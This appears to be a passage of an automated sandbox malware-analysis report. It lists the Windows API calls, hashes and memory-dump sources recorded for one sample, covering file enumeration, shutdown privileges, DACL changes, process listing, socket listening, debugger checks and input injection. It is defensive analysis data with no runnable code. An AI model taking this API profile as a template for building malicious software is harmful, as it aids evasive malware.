                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: FolderPath$LocalTime__swprintf
                                          • String ID: %.3d
                                          • API String ID: 3337348382-986655627
                                          • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                          • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                          • FindClose.KERNEL32(00000000), ref: 0044291C
                                          • FindClose.KERNEL32(00000000), ref: 00442930
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                          • FindClose.KERNEL32(00000000), ref: 004429D4
                                            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                          • FindClose.KERNEL32(00000000), ref: 004429E2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 2640511053-438819550
                                          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                          • GetLastError.KERNEL32 ref: 00433414
                                          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 2938487562-3733053543
                                          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                          APIs
                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                          • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                          • GetLengthSid.ADVAPI32(?), ref: 00446241
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                          • CopySid.ADVAPI32(00000000), ref: 00446271
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                          • String ID:
                                          • API String ID: 1255039815-0
                                          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                          APIs
                                          • __swprintf.LIBCMT ref: 00433073
                                          • __swprintf.LIBCMT ref: 00433085
                                          • __wcsicoll.LIBCMT ref: 00433092
                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                          • LockResource.KERNEL32(00000000), ref: 004330CA
                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                          • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                          • LockResource.KERNEL32(?), ref: 00433120
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                          • String ID:
                                          • API String ID: 1158019794-0
                                          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                          • GetLastError.KERNEL32 ref: 0045D6BF
                                          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove$_strncmp
                                          • String ID: @oH$\$^$h
                                          • API String ID: 2175499884-3701065813
                                          • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                          • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                          • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                          • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006), ref: 0046530D
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                          • closesocket.WSOCK32(00000000), ref: 00465377
                                          • listen.WSOCK32(00000000,00000005), ref: 00465381
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                          • closesocket.WSOCK32(00000000), ref: 004653BD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                          • String ID:
                                          • API String ID: 540024437-0
                                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                          • API String ID: 0-2872873767
                                          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                          • __wsplitpath.LIBCMT ref: 00475644
                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                          • _wcscat.LIBCMT ref: 00475657
                                          • __wcsicoll.LIBCMT ref: 0047567B
                                          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                          • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                          • String ID:
                                          • API String ID: 2547909840-0
                                          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                          APIs
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                          • Sleep.KERNEL32(0000000A), ref: 0045250B
                                          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                          • FindClose.KERNEL32(?), ref: 004525FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                          • String ID: *.*$\VH
                                          • API String ID: 2786137511-2657498754
                                          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                          • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID: pqI
                                          • API String ID: 2579439406-2459173057
                                          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                          APIs
                                          • __wcsicoll.LIBCMT ref: 00433349
                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                          • __wcsicoll.LIBCMT ref: 00433375
                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wcsicollmouse_event
                                          • String ID: DOWN
                                          • API String ID: 1033544147-711622031
                                          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 0044C3D2
                                          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
